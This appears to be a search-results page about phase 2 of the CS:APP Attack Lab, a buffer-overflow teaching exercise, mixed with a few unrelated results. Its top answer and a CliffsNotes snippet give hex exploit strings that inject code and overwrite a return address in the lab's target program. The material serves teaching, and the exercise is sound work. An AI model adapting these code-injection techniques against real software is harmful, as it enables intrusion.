I have asked my professor and got the solution.

Initially, my incorrect exploit string was

48 c7 c7 a2 59 d6 4e 00
68 c3 18 40 00 00 00 00
c3 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00

However, my prof told me NOT to add any extra bytes between the instructions. So I tried

48 c7 c7 a2 59 d6 4e 
68 c3 18 40 00
c3
00 00 00 00 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00

and it works!

Thus, we just need to make sure that all bytes of the instructions are together with no padding between, and don't mess up the order of instruction in term of bytes!

Answer from Sarah N on Stack Overflow
🌐
Navan
web.navan.dev › posts › 2023-10-05-attack-lab.html
Attack Lab
jxxxxn@jupyter-naxxxx88:~/lab3... PASS: Sent exploit string to server to be validated. NICE JOB! Phase 2 involves injecting a small amount of code as part of your exploit string....
🌐
GitHub
github.com › magna25 › Attack-Lab › blob › master › Phase 2.md
Attack-Lab/Phase 2.md at master · magna25/Attack-Lab
Phase 2 involves injecting a small code and calling function touch2 while making it look like you passed the cookie as an argument to touch2
Author   magna25
🌐
YouTube
youtube.com › watch
Attack Lab Phase 2 - YouTube
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
Published   April 6, 2017
🌐
liblaf
hope.liblaf.me › 2022 › course-work › csapp › attack-lab › 2022-04-23-phase-2
Attack Lab: Phase 2 | liblaf
April 23, 2022 - gcc -c phase-2-inject.s objdump --disassemble phase-2-inject.o > phase-2-inject.asm · ... 0000000000000000 <.text>: 0: bf 2f 6c 9a 3a mov $0x3a9a6c2f,�i 5: 68 6a 1b 40 00 pushq $0x401b6a a: c3 retq · $ gdb ctarget --tui ... (gdb) break getbuf Breakpoint 1 at 0x401b28: file buf.c, line 12. (gdb) run -q Starting program: /home/stu2020012872/3-lab-3-attacklab/target97/ctarget -q Breakpoint 1, getbuf () at buf.c:12 (gdb) stepi (gdb) info registers rsp rsp 0x55668c98 0x55668c98
🌐
Byu-cpe
byu-cpe.github.io › ecen224 › programming-assignments › attack-lab
Attack Lab: Understanding Buffer Overflow Bugs • ECEn 224: Intro to Computer Systems
unix> ./hex2raw < ctarget.l2.txt | ./ctarget Cookie: 0x1a7dd803 Type string:Touch2!: You called touch2(0x1a7dd803) Valid solution for level 2 with target ctarget PASSED: Sent exploit string to server to be validated. NICE JOB! The server will test your exploit string to make sure it really works, and it will update the Attacklab scoreboard page indicating that your userid (listed by your target number for anonymity) has completed this phase. You can view the scoreboard by pointing your Web browser at the link given on the class Web page for this class. Unlike the Bomb Lab, there is no penalty for making mistakes in this lab.
🌐
GitHub
github.com › befortier › Attack_Lab
GitHub - befortier/Attack_Lab: A lab that involves 5 phases of buffer overflow attacks. The first three deal with Code injection attacks and the last two phases deal with return operated attacks. Solutions are described in solutions.txt · GitHub
All you need to do is fill your ... to for touch 1. Phase 2: Fill your buffer with malicious code that moves your cookie's value, by moving its adress in memory, into rdi and follow it with a return....
Author   befortier
Find elsewhere
🌐
GitHub
github.com › KbaHaxor › Attack-Lab › blob › master › Attack Lab Phase 2
Attack-Lab/Attack Lab Phase 2 at master · KbaHaxor/Attack-Lab
Implementing buffer overflow and return-oriented programming attacks using exploit strings. - Attack-Lab/Attack Lab Phase 2 at master · KbaHaxor/Attack-Lab
Author   KbaHaxor
🌐
Scribd
scribd.com › document › 445193260 › attack-lab
Attack Lab | PDF
attack lab - Free download as PDF File (.pdf) or read online for free. attack lab solutions
Rating: 1 ​ - ​ 1 votes
🌐
Carnegie Mellon University
cs.cmu.edu › afs › cs › academic › class › 15213-f15 › www › recitations › rec05.pptx pptx
15-213 Recitation: Attack Lab
15-213/18-213: Lecture TR, 1:30-2:50, DH 2210 12 units · 15-513: Videotaped lectures and recitations (These will appear within 24 hours guaranteed, but typically within a couple of hours.) 6 or 12 units
🌐
GitHub
github.com › magna25 › Attack-Lab
GitHub - magna25/Attack-Lab: Walk-through of Attack Lab also known as Buffer Bomb in Systems · GitHub
A brief walkthrough of the buffer overflow attack known as Attack Lab or Buffer Bomb in Computer Systems course. There are 5 phases of the lab and your mission is to come up with a exploit strings that will enable you take control of the executable file and do as you wish. The first 3 phases include injecting small code while the last 2 utilize the ROP (Return Oriented Programming) exploit.
Starred by 84 users
Forked by 129 users
🌐
CliffsNotes
cliffsnotes.com › questions & answers › computer science › attack lab phase 3 i am stuck on attack lab phase 3. i have a 28 byte buffer in getbuf. this is my rsp address:...
[Solved] Attack Lab Phase 3 I am stuck on attack lab phase 3. I have a 28 byte buffer in getbuf. This is my rsp address:... | CliffsNotes
November 11, 2023 - Here was my phase 2 answer: 68 fb 17 40 00 bf 1b 91 ef 7f c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 c9 65 55 00 00 00 00 I pushed the return address of phase 2 to the stack, moved my cookie to rdi. Im stuck now because I dont really know how to calculate the padding values for phase3. The idea is that we cant store our cookie in the getbuf stack because the hexmmatch function will overwrite it and mess us up our cookie. SO we store the cookie outside of the getbuf. You can refer to this I think its helpful somehow. https://github.com/magna25/Attack-Lab/blob/master/Phase 3.md or this : https://siyangshao.github.io/posts/202206240956/
🌐
Virginia Tech
courses.cs.vt.edu › cs2506 › Fall2017 › C › AL › attacklab.pdf pdf
CS 2506, Computer Organization II The Attack Lab Parts I ...
In Phases 2 and 3, you caused a program to execute machine code of your own design. If CTARGET had been a network server, you could have injected your own code into a distant machine. In Phase 4, you circumvented two of the · main devices modern systems use to thwart buffer overflow attacks.
🌐
Yahoo!
yahoo.com › news › articles › planned-gps-launch-space-force-193200292.html
With planned GPS launch, Space Force turns again to SpaceX amid ULA Vulcan issues
April 20, 2026 - That mission as well as Tuesday’s GPS launch are among those awarded under the NSSL Phase 2 contract, which handed out 48 task orders between fiscal years 2020-2024.
🌐
YouTube
youtube.com › programming assignment tutor
[DEFUSED] Solve Attack Lab(Buffer Overflow) Step by Step #CISC221 #CSC373 #CS211 - YouTube
Solve Attack Lab(Buffer Overflow) Step by Step #CISC221If you need help with any projects about Bomb Lab / Attack Lab / Contact us: labsolved@gmail.com
Published   November 25, 2024
Views   460
🌐
Old School RuneScape Wiki
oldschool.runescape.wiki › w › Galvek
Galvek - OSRS Wiki
April 28, 2026 - This phase is common to die in due to players trying to move to avoid his special dragonfire attack or moving at the same time Galvek teleports them, resulting in the player running into a bomb and dying. Galvek's defence in this phase can be lowered, however on transition to phase II his defence will be restored to its base value. ... Galvek takes on the powers of air, flying towards the western side of the ship. He can occasionally launch gusts of wind that drain the player's stats by 2 and run energy by 40%. Galvek also begins to use Ranged attacks here and uses his Ranged and Magic attacks at random.
🌐
LDShop
ldshop.gg › blog › last-asylum-plague › alliance-duel-strategy-guide.html
Last Asylum: Plague Alliance Duel Strategy Guide – How to Win Every Phase
April 21, 2026 - Join alliance rally attacks. What to save: Building speedups. Don't get antsy. The Territory Development phase is next, and that's where your construction investment actually pays off . Welcome to the phase where the pre-build strategy turns you into a scoring machine. This phase rewards building upgrades and construction activity. ... If you have a building upgrade that takes more than a day, start it before Phase 2 opens—but do NOT tap the completion hammer.
🌐
Scribd
scribd.com › document › 797107884 › CENG331-attacklab
Attack Lab: Phases Overview | PDF | String (Computer ...
CENG331_attacklab - Free download as PDF File (.pdf), Text File (.txt) or read online for free.